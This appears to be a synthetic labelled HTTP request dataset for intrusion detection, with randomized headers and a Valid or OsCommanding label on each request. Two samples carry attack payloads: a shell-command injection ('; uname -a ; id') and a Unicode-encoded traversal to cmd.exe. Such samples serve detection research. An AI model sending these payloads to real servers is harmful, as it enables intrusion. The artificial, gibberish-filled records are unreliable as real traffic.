Accept-Language: re9h-1tfSjro;q=0.1, hrxat5ge-ia, i-ihysheo;q=0.9
Cache-Control: only-if-cached
Client-ip: 27.25.46.254
Cookie: 1afraiprntal=01695824;toTw0si=fat
Cookie2: $Version="6"
Date: Mon, 17 Jan 05 10:21:30 CET
ETag: W/"BDMRBwNmUW7P.XXGn"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Fri, 27 Oct 06 07:16:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Aug 07 16:43:33 UTC
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: NTLM Zjdzb3RzZWxoYWRyeWFrYVRla0RkZG8xZkYxc2VsZWxzaGlnMTJtdGV2bnRldGlp
Range: -351866,-996363,00-
Referer: http://tmaahsl6.uk/Ia7j6m/6uEud/ns6n/nEx8/e44dnnon.tiff
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: bJltostaql (o_sX1k; eMuNTNB@XO; hHo_gO0n8; iZDspkfV_; rBbo7f)
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2073x766
Via: 6.4 144.180.153.142, 1.5 www.dy7xi.htm
Transfer-Encoding: gzip
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49575
Start - Id: 11595
class: Valid
GET /tI@aR/mg/nfgpe/aunIX07GYKVhByam/eX9Q9OZN3syy3/tXf5lzrk5H41b.htm?bcsirgd=397631&tmcPscqph=894239&vtllttcEesottgA=vinehae%7Cw7yUn&wJT-l=uraptedERio&eYFZ=159119&beisbnl=rcpniposition&ee1uia1pstpnsRd=9Le&Asvnb=26008&ecerl=cN9ktO6L HTTP/1.0
Host: 253.56.174.211
Connection: close
Accept: text/plain, image/png;q=0.4
Accept-Charset: x-mac-hebrew, x-mac-roman;q=0.6, windows-1252, iso-8859-7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 218.86.59.126
Cookie: semameVos=8300;3u4ufmpo=teuwindow.openaNgtstdinz;T68gonS0nlt=1590430658
Cookie2: $Version="797"
Date: Sat, 15 Jan 05 13:55:00 CET
ETag: "zgZofdDa4Pl1l7VJSRn"
Expect: ieHlenh
From: zerri@aeliind1i.ch
If-Modified-Since: Sat, 10 Jul 04 10:51:28 GMT
If-Unmodified-Since: Mon, 04 Feb 08 20:31:14 CET
If-Match: "nSe_twqH0ttiMb65"
If-None-Match: *
If-Range: Sun, 07 Jun 09 15:28:43 GMT
Max-Forwards: 2256
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic aUlpOTY6bGVpbg==
Authorization: NTLM ZWNvOU85c2RkMmluY2ljcmt6dG5pcHJyaURqNXNUajNhcjQ2ZmQ=
Range: 4539-2283,-21
Referer: http://www.nanewdsy.gov/naaeHraO/bdtitht/rpa21.gif
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: tota (eaIQfj; oz-PZOXG_; 6n_8oJ9qj; rcbW0f3z8)
UA-CPU: 68000
UA-Disp: 503,414,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 505x6674
Via: 0.1 www.jetlei9h.js
Transfer-Encoding: compress
Upgrade: to4v/4.9, hnI/2.8
Warning: 436 www.8wh4eAe.js "nrirsinot" 
X-Forwarded-For: 96.138.208.138
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11595
Start - Id: 30996
class: Valid
GET /4uI3.pVAwjpD06SxqGS/rVE-k-ZKZ/nh_dropAGBVxJWb/4cteeosreewgfenwbbec/lmninw5Lan/hK6oaGncFFOe2pN6/aUseecEreor/p4weihAEinee1oheics/uaoknaoqryhmwOomme/tuFcbp9Fh.IQ-y9u/M.9/ora5e1xcurh.shtml? HTTP/1.1
Host: 50.134.55.211
Connection: keep-alive
Accept: video/*;q=0.3, audio/*, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: etayb-nofno4ew;q=0.6, Ows-etnec, tet-rmein4h, o-i;q=0.8
Cache-Control: max-stale=7243
Client-ip: 93.143.127.166
Cookie: i5Idnd1nn=o;es=aj'nbmrgrI we;eh=82;p42cl=0735549416
Cookie2: $Version="428"
Date: Wed, 07 Jan 09 12:50:11 GMT
ETag: W/"el0c1yy8dBuCFQ9LYC"
Expect: iRaev2ns
From: roiehnen@tctren.st
If-Modified-Since: Tue, 15 Dec 09 08:10:41 GMT
If-Unmodified-Since: Tue, 27 May 08 19:55:41 GMT
If-Match: "d2pM26oWGxvU3g-g"
If-None-Match: "P3IsLieuAkB3Xh6q"
If-Range: "8U0Bkv.NC7Umb1IO"
Max-Forwards: 10
MIME-Version: 7.6
Pragma: a3yNNrec='svtakd'
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: Digest uri=/rhxplh/Meeeprif/owL1sf/7snff/ttedL.mdb
Range: 6-
Referer: /eopf/NaoE/8iIaT.pl
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 8.8; et-es; rv:8.2.6) Gecko/15380691
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/3.3 www.myyNhaw.html, abtti/4.4 2.151.172.224:43813, 6.4 www.ivlAI.gif
Transfer-Encoding: identity
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 175 www.rwitemw.jpeg "lzlarmInhrd" "Wed, 18 Jan 06 20:37:52 CET"
X-Forwarded-For: 73.18.235.121
X-Serial-Number: 65625
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30996
Start - Id: 36777
class: OsCommanding
GET /i5nWnQ1pWBdKBGYyG/RksH/g113@/naetxd/nTN9lKqFv-ZzgGlh2.dll?lso7=le1HeB3BbLS7&2s=+%3B++echo++++%3Bw+++%3B+uname+-a++++%3B+++++id&symi=eloi6attboot.inieiaO&n9ot=+babaonaR2o&pai=n2vn8BTtxf&cteoenzaLea=hH%3Fah7u&bnunhgWwsbI=24850 HTTP/1.0
Host: 185.37.152.184
Connection: keep-alive
Accept: application/*;q=0.8, audio/basic;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate, gzip;q=0.0, gzip;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 88.245.36.40
Cookie: ehRewttg=9687;shAaesssS=iI37-PN9;ttvNohEf1=q;x2B2hhe=464706319;eoid4soih=catisam h/ci~a[e
Cookie2: $Version="4"
Date: Sun, 03 May 09 19:56:48 UTC
ETag: W/"31ix0xl8krLbJGHhVw"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Fri, 03 Oct 08 05:24:18 GMT
If-Unmodified-Since: Thu, 17 Nov 05 04:00:57 UTC
If-Match: *
If-None-Match: "nfiqyhMKm9XLjNWZSg"
If-Range: Wed, 22 Nov 06 11:14:50 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: /8n8e/atqf.mpeg
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: owsinxmodapkv4mc
UA-CPU: MIPS
UA-Disp: 030,272,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: 0.8 191.50.111.146
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36777
Start - Id: 14926
class: Valid
GET /2i@EVCj_eyBBR/74jC7EIi..J2xCs.Qvy/ae.mdb?9afnhaefg7eopi=Ugttcg%25%25uaaeyI&Amsrph7=lxp_%2F3%3Di3hlwksOhd&Oe=891031&hhnadNtodeiw=85120314&suHy=esh%7E%5C+w9em&nj6D=+%3Ah&Srvhtttzltst=etcemiaad HTTP/1.0
Host: www.stahdk5.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=03943
Client-ip: 210.67.84.109
Cookie: Raw69aimIfesEh=321;qQFsUMsxY5.=lTi;eprIleAH=rdoa1kotvec9ay;8ck3elTEt3ryA=tb@
Cookie2: $Version="27"
Date: Tue, 08 Aug 06 05:50:19 GMT
ETag: "gPd@-AJtuX3KeUkp_L"
Expect: 100-continue
From: oate@atmthod.ch
If-Modified-Since: Wed, 30 Jun 04 09:14:03 CET
If-Unmodified-Since: Mon, 26 Mar 07 01:31:50 CET
If-Match: "jSq@QV@1Xl5SgPmI-"
If-None-Match: *
If-Range: "5xvmbj3cilPDK01"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: ig='uo'
Proxy-Authorization: NTLM dGlkQmxNbm9idG1uTmVjYXMxaWZzYW80aW9hbGFlSWVuc3Rpc3JwdTFsOWE0
Authorization: NTLM YXJkSTlhNlNoRG5ib3NlbWNvcXJkbm5zZjR0YXJtclRld25paXR1
Range: 19024-74,-1374,-1
Referer: http://atm3exci.gov/ebsionc/rahho/sIrhon.sh
TE: trailers
Trailer: From
User-Agent: Mozilla/1.2 (compatible; irgn; Open BSD i586; btnwvni7l; sBtae)
UA-CPU: PowerPC
UA-Disp: 509,721,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: HTTP/3.4 174.206.116.163, 7.1 102.245.64.69:06
Transfer-Encoding: tddi
Upgrade: lalo/8.4, 8ggsn/9.9, nnnni/6.5, fayg/4.2, opiva/3.7
Warning: 194 www.rm0lai.jpeg "gocxkLhNTt9pfsEbecg" 
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 51313390873628125654
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14926
Start - Id: 44101
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ewsunteLoa.de
Connection: keep-alive
Accept: text/plain, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: temse-en5iha, i-rb;q=0.9, 7ffcaf-yetllt, BmNnofo-mtnheeT;q=0.4
Cache-Control: max-age=97400
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Wed, 06 Jul 05 20:07:32 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Digest uri=/taeZ9/rhunOa/vnpaf.mspx
Range: 70-
Referer: http://www.fshsie7m.fr/nqarFuuo/e0eoaaog/actaoia/h1inE.shtml
TE: deflate;q=0.0
Trailer: Date
User-Agent: uhiorulr (tQ4n55; iKnBsDXC; ok7WeZ; iucDiSqQ; t9IFbrVRY9)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: p3nw/6.4 239.198.77.138, FTP/4.4 www.adnaao.shtml, HTTP/0.8 210.137.141.112:893
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 388289600968011
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44101
Start - Id: 24674
class: Valid
GET /pdLF_Dw/Oih/stTjs@EMJCDTSJg/exec0anPha/8aNKSqstdin-9Oxp_wBm.htm?4a=878042&seoleMzihher=9ibell&YMbUqnevalIsrsam=dpthttpiwnlt+Sishutdown9&wod9ea=we%27%2Faccess_logiowwG&ALu7nqs=iROne&jlad=4860 HTTP/1.0
Host: www.trxej.ch
Connection: keep-alive
Accept: application/postscript, text/html;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 148.233.252.203
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="0"
Date: Thu, 22 Apr 04 08:40:36 CET
ETag: "UUtSeN9LUVPQfT3E"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Tue, 16 Dec 08 16:34:10 UTC
If-Unmodified-Since: Tue, 01 Aug 06 13:42:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7558
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Ulerl tpdert=str7o
Range: 628095-,47-562,-3325
Referer: http://www.Smsah.gov/ehutb/h9enaee.pdf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.1 (compatible; MSIE 0.7; Win 9x; Eelh; dPos0oy)
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.6 58.50.49.95
Transfer-Encoding: compress
Upgrade: wit/8.9
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24674
Start - Id: 1659
class: Valid
GET /htLVaW41A8x@MS1zcD/wvE@AdQF/xp_4MEwmSFhZDDE/3w/1fAtntmpL/eosgms6ninm7Tegsoq/ABrlibtV_cGxtermJT/bdu.Ko/dPVWqrRAwr/0-vu5C.css? HTTP/1.0
Host: 127.152.236.0
Connection: e4eeli
Accept: audio/x-wav, text/*
Accept-Charset: utf-8;q=0.6, iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: wahrN5Ne-d1ivaa
Cache-Control: max-age=471
Client-ip: 167.69.61.157
Cookie: tol0eGisr=ezjvLm;reoiaymtosIYcgS=ssystem;ln=4huHstdin?)ooai;TQy=164
Cookie2: $Version="23"
Date: Mon, 15 Nov 04 07:59:18 CET
ETag: W/"bMCVqCdZp90EHMf8XQ5"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Mon, 05 Apr 04 06:01:28 GMT
If-Unmodified-Since: Mon, 02 Oct 06 18:45:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jun 06 24:46:19 UTC
Max-Forwards: 6
MIME-Version: 9.8
Pragma: mmiiu3gr='uteiat'
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: Digest realm
Range: 94-
Referer: http://www.stk1gshe.fr/edeCe.msf
TE: trailers
Trailer: Via
User-Agent: 0pOfIdtn72 (pKbuhZ; emX@BKZmB; iQm717xl7_)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3594x3874
Via: kNeemR/2.4 38.158.68.3
Transfer-Encoding: identity
Upgrade: toe/3.4, erkdin/7.1, 5elTNe/2.3, n0otGk/3.5
Warning: 713 www.liacs.shtml "tenh1oogsntt7wsMck" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1659
Start - Id: 33853
class: Valid
POST /t.WM6IxIWSWCm8.C3G/6snmozaoHthwco8ol/QVi5w/eqObSodbeIraae67wt/sfmaletSl8xunesoDeNo/t9flRW/jTwNHWqGozoo@d/elntn.php3? HTTP/1.1
Content-Length: 177
Content-Language: roaohoq,1ets,aacet27e
Content-Encoding: gzip
Content-Location: http://www.alt7h8.de/ereisfEa/tamefUo.nsf
Content-MD5: dXNlU29iV3VhdG5hZ3N0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Mar 08 17:35:43 CET
Last-Modified: Sun, 29 Nov 09 17:07:19 GMT
Host: www.nRiefimmea.cz
Connection: sswets9A
Accept: audio/basic;q=0.8, audio/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 97.44.87.46
Cookie: cieccmokwfs=hidR)asnt'btEoDiAec
Cookie2: $Version="264"
Date: Mon, 23 Jun 08 08:18:42 CET
ETag: W/"COp0UgeCb27E23yDy"
Expect: iIe36c
From: tdove@2rii.it
If-Modified-Since: Sun, 27 Feb 05 24:53:46 GMT
If-Unmodified-Since: Sat, 15 Oct 05 09:53:23 CET
If-Match: "KxqlW5kjyJedu52"
If-None-Match: "Bvu4t70EDRUes4bVrvre"
If-Range: "0e@eJvI6nl.J9_TV99CY"
Max-Forwards: 71
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: oah9b mhttew=i9iaru1
Authorization: NTLM YWFsMjBmbmVtanBUNnRldGFpZkNhYXQ4aHRpb3RyY2lsYXBh
Range: 8190-,7682-
Referer: http://www.jFsserg.uk/wcUre/ennr0Od/nemsDsdd/Htin9egh.bin
TE: deflate;q=0.4,chunked;q=0.1
Trailer: If-Range
User-Agent: u8oamEb/4.9.3.1.3
UA-CPU: 68000
UA-Disp: 3260,0446,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: HTTP/3.1 191.109.106.14:436, 7.3 110.29.129.108
Transfer-Encoding: gzip
Upgrade: xoon/8.9, dldn/6.0
Warning: 343 www.suiglbE.html "pthnTtNjlbncxd" "Fri, 09 Sep 05 11:27:25 CET"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nblNdstd6w=iAs&EpsBUstdincUllj3=Ahp&mtsep=%+&xSayjosb=tids&ewz3dna=4open(cX; e5ias ai&oj=iatfy&edwm=3xKJGIu&uairwho0=l7vysiaEetgna&aeRryvht=c(dbetweenrr + Pirh  g|

End - Id: 33853
Start - Id: 27091
class: Valid
GET /n-UF-YmYxyOtNyGgHwP/xnrUqmmqrXc4x9cv/gAvTWLsVr4ZXgon/7J/anhgeiao/lbh4jooO/vopiasis/grdttetydrmisx/XLTp3./eTbYUGjJeqTq1JxSJ5n-.jpg?oIc=91560&LJEwIWhG1SwY=wKx.0ljpt&er2Eeraoe=bA0dti7mdcn&we=341&enmletfzurl9mto=01965&r6ltenaAwo=eZhH&uEdnanouht=ivcf3SOheWe0l&1si=at%27bwggTTt&iohmddsceadxa=te%3FtTue%3Athttpp9u%3A9tA&XdfediOeelof=+iscript+&ierfrieswsntt=fetu&0a2LtmUGO0Rnode=nLa3&mt=3et&eieewXtwhoc=ot%40%5BrOlpa%3Fejloscriptine&iedpd=oQSI0-7VF4jl HTTP/1.0
Host: www.seegr.org
Connection: keep-alive
Accept: video/*;q=0.9, image/*;q=0.9
Accept-Charset: iso-2022-kr;q=0.3, windows-1253;q=0.7, x-mac-cyrillic
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 112.10.210.53
Cookie: xoamrje3anbIs=o8H;eSvlbesal7rpd=8540;aq=lenull;VE3Q8allEv=4;hskeintRmlea=96;UPtnphp=romdb4rnshitoqo
Cookie2: $Version="48"
Date: Tue, 28 Nov 06 09:23:45 UTC
ETag: "4fdAs_FjwYl@28wdWS"
Expect: lhbqheeu=elirEeb;an4odjpe=aihctheE
From: hhafeiO@hshvl.net
If-Modified-Since: Sun, 10 Oct 04 06:19:19 GMT
If-Unmodified-Since: Thu, 30 Jun 05 09:56:58 GMT
If-Match: *
If-None-Match: "kT7LzVEXA1pOSMS5H8y"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.1
Pragma: Ceweco='t'
Proxy-Authorization: Basic ZERlaWQ6OHZkd3BuMw==
Authorization: NTLM NG5ibnN1d25sYVRic0VzaGFUc3hhNjE5dU8zdGFldHNmYQ==
Range: 22-,0045-2456,-6
Referer: /eePutAni/n6er/me7onj2/ieo8.exe
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 4.2; bo-eI; rv:0.2.0) Gecko/75362843
UA-CPU: Sparc
UA-Disp: 3070,8448,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0161x6638
Via: FTP/2.9 136.202.102.10
Transfer-Encoding: compress
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 889 www.tgks.jpeg "rieo" 
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27091
Start - Id: 17481
class: Valid
GET /7.kATWzSxYLnXwB6/s0seotnhse8sve/mObe9xH1@/4iepsode.jsp? HTTP/1.1
Host: 21.221.123.226
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic, iso-8859-5;q=0.5, iso-8859-8, windows-1250;q=0.8, x-mac-roman
Accept-Encoding: deflate;q=0.2, compress, identity
Accept-Language: r-zt7fs;q=0.0, seioseat-3e, u-itnabieN;q=0.9, oglhW-bee, rTz0enlo-hMo
Cache-Control: max-age=51
Client-ip: 97.68.166.85
Cookie: Ratqa10=390448;EZtelnetVvqZh=ZhftAenrEiDeit;iaekdti4=Bq78(-ualDnrincludeE;cneregeqt=inputmpsshr;kne0=ltmn:d:imbor peandnbt;8kctd=1112434
Cookie2: $Version="41"
Date: Mon, 02 Jan 06 24:26:23 UTC
ETag: W/"Seunx4A7.Yc4@PBm"
Expect: Entgamhr
From: aouohwa@aExm.org
If-Modified-Since: Mon, 01 Jun 09 22:10:26 CET
If-Unmodified-Since: Thu, 05 Apr 07 16:59:43 UTC
If-Match: "XeY@MhZbDMHr.Ur-v"
If-None-Match: "M@3xxSW3o2TovhV"
If-Range: "_2O8N2VXkG5Cgsmo"
Max-Forwards: 50
MIME-Version: 2.9
Pragma: 0='f'
Proxy-Authorization: qytitt extae=g3iiar
Authorization: Digest response="2DF9E0BF4cBD39BbdddA08FA18FB5cdF"
Range: 11972-3
Referer: http://o8phC3ha.be/Iiaq0a/hrne/D6NE/aernarE.jsp
TE: trailers,deflate;q=0.5,trailers
Trailer: If-None-Match
User-Agent: unnehO (iZk5nXzxg; h3go7ul0hH; dp.4@Ecz3; mk2Hl0O; 7BNow.)
UA-CPU: StrongARM
UA-Disp: 5103,184,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 767x663
Via: 4.5 www.hEl3IIab.html, 5.1 65.22.96.181, 9.0 www.hsbalma.js:54
Transfer-Encoding: compress
Upgrade: 8yndaa/8.9, dn8nen/3.7
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17481
Start - Id: 10152
class: Valid
GET /ateqgju6aee/he.@GQhzWNq27CM4/ytaiolsHa/icvelOt4boRumnoceue/a3torIyHs/oega/rW2IOnVXui/rnkfoxreeb/nUZQDJ8A/e3zOY-Yad-HKsA477U..cgi?execlQjgZfnJQaccess_log=xbd%7Eid+fSe9eetciframe&9otmlmowt20=9005&hee=%3Aidl%27&yzoeattM=87&HGRgroup byT=13763&eh9fvee=kzKluX&eot=ee&j9rsdeoypzt5ile=o8Ae8E&ete1dzd=140&coe=4453274&it=ojra8hxXnowirdeo3e&zTrdropy42_=%7Ce%27D&neiut5t=36014776&e1sij=MgutIa75Duuv HTTP/1.0
Host: www.pbef2.com:3
Connection: aqaaoifw
Accept: */*
Accept-Charset: shift_jis;q=0.6, euc-jp
Accept-Encoding: compress;q=0.5, compress
Accept-Language: s-jnqenio, wlde8tq-iasheh, zn7e-la;q=0.1, s-y;q=0.5, te-a6uacf;q=0.0
Cache-Control: e=ehh9
Client-ip: 128.232.71.123
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="9"
Date: Sat, 17 Jan 09 20:55:12 CET
ETag: W/"CWRCG.AwZFSBB7Ep"
Expect: OElh4ec
From: ohLlh9sd@bflghwyl.cz
If-Modified-Since: Thu, 04 Jun 09 20:06:11 UTC
If-Unmodified-Since: Fri, 10 Jun 05 12:37:54 GMT
If-Match: "A82RR0WwfyjG6FIq"
If-None-Match: "zd@i8egFqbsDge8"
If-Range: Mon, 21 Aug 06 01:22:25 UTC
Max-Forwards: 04
MIME-Version: 0.8
Pragma: nt='tMezs'
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Basic ZU5oemRFNGE6bm1scnA=
Range: 962502-,4-
Referer: http://waaU8a.cz/raiztsa.doc
TE: trailers,gzip
Trailer: TE
User-Agent: enbmctoe (eY9nzabto)
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 012x3228
Via: 4.5 193.55.6.63
Transfer-Encoding: deflate
Upgrade: wegjm/5.8, Iers/0.9, ysy5/4.0
Warning: 760 103.21.169.19 "ehktdthtsuo8twhig" 
X-Forwarded-For: 73.178.177.84
X-Serial-Number: 87261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 10152
Start - Id: 5133
class: Valid
PUT /yAPteYp-OBoprzlBw./eevuIcexrg/Segaen/beuhIoRet6/nmH@Eg2GuzEZl/Seiiaiy9smvef/HedisshAmaafaun2/TR_o7Z/9inn9rc/eTbGSnLFqMbG3OiIi.js? HTTP/1.1
Content-Length: 181
Content-Language: oEEsf,pefTek9z,ieyFt
Content-Encoding: compress
Content-Location: /wjca/ngad/onJ9.pdf
Content-MD5: Z2ZyMGNnNXNyYWVvbno4dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jul 04 19:11:35 CET
Last-Modified: Fri, 26 May 06 04:01:21 CET
Host: www.vIioW.net
Connection: Sira7c6w
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-15, x-mac-arabic;q=0.8, utf-7, ks_c_5601-1987;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 167.58.57.131
Cookie: rds=e3;;paekj=o)
Cookie2: $Version="190"
Date: Sat, 24 Sep 05 17:42:13 CET
ETag: "8E82KKTK9E5YqyL"
Expect: 100-continue
From: uieNui@f0tYn0rTH.biz
If-Modified-Since: Fri, 26 Sep 08 02:16:26 GMT
If-Unmodified-Since: Thu, 20 Jan 05 15:16:30 CET
If-Match: "g3O33Sze-keXW5R.9ubH"
If-None-Match: "_1m7XVuYfZRtNDt6KUT"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.5
Pragma: hUbhr='asehAscd'
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: Basic ZmVvZm51aWk6aGFwcg==
Range: -00275
Referer: http://www.k4stloaw.net/sneiheoy/nansHsoH/dn5al/snvia/ewfdA.sh
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 1.6; Ss-yt; rv:2.7.3) Gecko/68697791
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6672x349
Via: FTP/0.1 101.47.229.196
Transfer-Encoding: compress
Upgrade: htyer/9.6, eieony/5.7, tsi/1.0, iueef/9.6, tNbj/5.6
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 110.177.126.104
X-Serial-Number: 64870443961077
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sxenudnnc=eGjEoTO9w&oh5in9u1nonnhp=7309303&esuuilwDepderd7=$JU1t&t1zgiflBe8tre=i8g0.EsWyOO&RIrz5h2lRz=2oltcrr&update2-TYj=gE3hatnSs3sroneot&ewsnult=6>0tacceptsor@doaoeu&dn5=97

End - Id: 5133
Start - Id: 10634
class: Valid
GET /ZTIP4sgBTF8K/.lgroup byNZH/o2r/sLstUloon/etssreiaIeirsedttn/75rvOuP/ehfXDMKm4/moMi4CUd-XxXE/n6FBNonq8/%uQz1L.png? HTTP/1.0
Host: 182.69.37.65
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.8, x-mac-arabic;q=0.3, iso-8859-1, windows-1255, iso-8859-1
Accept-Encoding: 
Accept-Language: ten-e1, nfNclzp-ec;q=0.8, auep-D;q=0.5, fia-5rsw4, s-h;q=0.1
